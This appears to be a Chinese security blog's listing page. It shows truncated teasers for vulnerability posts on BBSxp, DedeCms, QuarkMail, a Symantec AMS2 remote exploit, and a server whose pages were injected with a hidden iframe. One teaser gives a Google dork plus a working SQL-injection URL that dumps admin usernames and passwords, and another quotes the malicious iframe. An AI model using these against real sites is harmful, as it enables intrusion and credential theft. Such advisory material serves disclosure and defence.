影响版本：BBSxp 2008 (Build: 8.0.4)
漏洞文件:MoveThread.asp
MoveThread.asp行2-24
#----代码阅读----#

查看更多...

Tags: BBSxpBBSxp

dedecms5.1爆出注入漏洞(极有可能全部版本适用)
漏洞关联文件：member_guestbook_action.php
源码解析：

$title = cn_substr(html2text($title),60);

查看更多...

Tags: dedecmsdedecms

漏洞文件：digg_ajax.php
#DedeCms v5.5 0day#
<?php
print_r(''
+----------------------------------------+

查看更多...

Tags: dedecmsdedecms

代码下载地址： http://www.dedecms.com/upimg/sof ... 55-GBK-Final.tar.gz

这个漏洞是上次那个代码执行漏洞的再次利用

查看更多...

1.google
inurl:friendlink.asp 网站介绍：E_mail:
exp:
productview.asp?id=8%20union%20select%201,admin,3,4,5,6,7,password,9,10,11,12%20from%20admin
爆出管理用户名 密码

查看更多...

漏洞说明：快客电邮（QuarkMail）是北京雄智伟业科技公司推出的电子邮件系 统，被广泛用于各个领域的电子邮件解决方案(该产品的主要客户名单http://www.ipmotor.com/cases/cases.html)， 其webmail部分使用perl cgi编写，近日笔者在渗透测试过程当中发现一处严重的安全漏洞，导致远程用户可以在邮件系统上以当前web权限身份下载任意文件，获取敏感配置文件（如 系统口令文件/数据库密码）从而进一步渗透主机或者系统。
影响范围：<=quarkmail server   version 1.2.1(本稿截止为最新版)
厂商网址：http://www.ipmotor.com/
漏洞解析：用户传入的 参数没有做有效的过滤，从而导致产生了目录遍历漏洞。

查看更多...

By  wuchaochao

一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了
<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>
这种样式的代码 有的在头部　有的在尾部 部分杀毒软件打开会报毒

查看更多...

#The AMS2 (Alert Management Systems 2) component of multiple Symantec products is prone to a remote #command-execution vulnerability because the software fails to adequately sanitize user-supplied #input.
#Successfully exploiting this issue will allow an attacker to execute arbitrary commands with #SYSTEM-level privileges, completely compromising affected computers. Failed exploit attempts will #result in a denial-of-service condition.
# # # # # # # # # # # # # # # # # # # # # # # # #
### SYMANTEC AV w/ INTEL FILE TRANSFER SERVICE
### REMOTE SYSTEM LEVEL EXPLOIT

查看更多...